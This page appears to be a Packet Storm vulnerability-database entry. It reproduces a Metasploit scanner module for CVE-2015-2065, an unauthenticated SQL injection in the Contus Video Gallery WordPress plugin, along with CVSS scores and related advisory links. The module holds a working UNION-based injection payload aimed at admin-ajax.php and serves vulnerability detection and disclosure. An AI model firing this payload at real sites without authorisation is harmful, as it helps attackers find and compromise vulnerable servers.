Lucene search
Bperry, Claudio Viviani, metasploit.comPACKETSTORM:181109HistorySep 01, 2024 - 12:00 a.m.
WordPress Contus Video Gallery Unauthenticated SQL Injection Scanner
2024-09-0100:00:00
bperry, Claudio Viviani, metasploit.com
packetstormsecurity.com
45
wordpress
contus video gallery
sql injection
unauthenticated
exploit
vulnerability
metasploit
cve-2015-2065
wpvdb-7793
CVSS2
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
AI Score
7.4
Confidence
Low
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress Contus Video Gallery Unauthenticated SQL Injection Scanner',
'Description' => %q{
This module attempts to exploit a UNION-based SQL injection in Contus Video
Gallery for Wordpress version 2.7 and likely prior in order if the instance is
vulnerable.
},
'Author' =>
[
'Claudio Viviani', #discovery
'bperry' #metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2015-2065'],
[ 'WPVDB', '7793' ]
],
'DisclosureDate' => '2015-02-24'))
end
def run_host(ip)
right_marker = Rex::Text.rand_text_alpha(5)
left_marker = Rex::Text.rand_text_alpha(5)
flag = Rex::Text.rand_text_alpha(5)
vprint_status("Checking host")
res = send_request_cgi({
'uri' => wordpress_url_admin_ajax,
'vars_get' => {
'action' => 'rss',
'type' => 'video',
'vid' => "-1 UNION ALL SELECT NULL,NULL,CONCAT(0x#{left_marker.unpack("H*")[0]},0x#{flag.unpack("H*")[0]},0x#{right_marker.unpack("H*")[0]}),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- "
}
})
unless res && res.body
vprint_error("Server did not respond in an expected way")
return
end
result = res.body =~ /#{left_marker}#{flag}#{right_marker}/
if result
print_good("Vulnerable to unauthenticated SQL injection within Contus Video Gallery 2.7 for Wordpress")
report_vuln({
:host => rhost,
:port => rport,
:proto => 'tcp',
:name => "Unauthenticated UNION-based SQL injection in Contus Video Gallery 2.7 for Wordpress",
:refs => self.references.select { |ref| ref.ctx_val == "2015-2065" }
})
end
end
end
`
Related
cvelist
cvelist
CVE-2015-2065
2015-02-24 17:00:00
prion
prion
Sql injection
2015-02-24 17:59:00
nvd
nvd
CVE-2015-2065
2015-02-24 17:59:01
wpvulndb
wpvulndb
Wordpress Video Gallery <= 2.7 - SQL Injection
2015-02-11 00:00:00
metasploit
metasploit
WordPress Contus Video Gallery Unauthenticated SQL Injection Scanner
2015-04-26 21:54:21
wpexploit
wpexploit
Wordpress Video Gallery <= 2.7 - SQL Injection
2015-02-11 00:00:00
cve
cve
CVE-2015-2065
2015-02-24 17:59:01
openvas
openvas
WordPress Apptha Video Gallery < 2.8 Blind SQLi Vulnerability
2015-04-08 00:00:00
patchstack
patchstack
WordPress Apptha Video Gallery Plugin <= 2.7 - SQL Injection
2015-02-24 00:00:00
exploitdb
exploitdb
WordPress Plugin Video Gallery 2.7.0 - SQL Injection
2015-02-12 00:00:00
kaspersky
kaspersky
KLA10491 Multiple vulnerabilities in WordPress plugins
2015-03-17 00:00:00
CVSS2
7.5
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
AI Score
7.4
Confidence
Low
Related for PACKETSTORM:181109